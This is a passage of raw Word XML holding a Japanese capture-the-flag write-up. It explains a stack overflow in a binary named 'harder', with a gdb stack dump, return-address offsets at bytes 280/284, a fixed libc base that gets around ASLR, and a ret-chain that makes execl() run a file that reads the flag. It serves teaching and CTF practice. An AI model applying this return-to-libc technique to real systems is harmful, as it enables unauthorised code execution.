                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff7c8:     0x00000001      0x08048430      0x00000000      0x0066cfc0</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff7d8:     0x00268a7b      0x00675ff4      0x00000001      0x08048430</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff7e8:     0x00000000      0x08048451      0x0804850b      0x00000001</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff7f8:     0xbffff814      0x08048590      0x08048580      0x00667d20</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff808:     0xbffff80c      0x00676670      0x00000001      0xbffff930</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00C00B86" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff818:     0x00000000      0xbffff944      0xbffff954      0xbffff95f</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00AF29A5" w:rsidRPr="00C00B86" w:rsidRDefault="00C00B86" w:rsidP="00C00B86">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>0xbffff828:     0xbffff9af      0xbffff9d3      0xbffff9e6      0xbffff9f0</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>スタックの状態は</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>関数内で「</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>push ebp; sub esp, 118h</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>」と行われていることから</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>esp+0x118</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイト先のスタックが</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>その</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイト先が</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>命令から復帰する際の実行アドレスになる。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>このことから、入力する文字列の</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>280</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイト目に</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>のアドレス、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>284</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>バイト目に</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>する実行アドレスを入力することで</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>実行アドレスを乗っ取ることができる。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>harder</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>の実行ファイルは、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>GNU_STACK</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>セクションによってスタックの実行フラグを落とされているため、スタックの内容を実行できない。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>また、サーバーの環境として</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>が有効なため、スタックや</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>getline()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>によって</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>malloc</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>されたアドレスを特定することは難しい。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>しかし、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>上であっても</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0x00110000</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>へ</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>が高確率でロードされることが分かっている。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>これらの状況から</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>libc.so</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>が</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0x00110000</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>へロードされることを前提として、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>execl()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を実行させることにした。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>execl</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>の引数に実行ファイルを指定しなければならないが、これは</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>内の</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"/bin/sh"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を含むアドレスを指定するか、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>のみ行うアドレスへ復帰を繰り返させることによりスタックポインタを進めて他のちょうど良いアドレスを引数にする必要がある。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ダンプ上の</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0xbffff75C</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>からは、入力文字列のポインタ、無関係なポインタ、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>と並んでいて、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>回実行されることで</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>execl</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>の実行ファイル名として任意の文字列を指定できる。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="009934CF" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="00AF29A5" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>任意のコマンドを実行できるほうが都合がよいため、今回は後者を利用することにした。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRDefault="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="004A5FAD" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>実際にフラグを読み取る動作を行う実行ファイルを作成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF29A5" w:rsidRPr="004A5FAD" w:rsidRDefault="00AF29A5" w:rsidP="00AF29A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A5FAD">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF29A5">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>このような実行ファイルを作成しなくとも、この問題を攻略できるが、この問題を解いた時点では</w:t>
      </w:r>
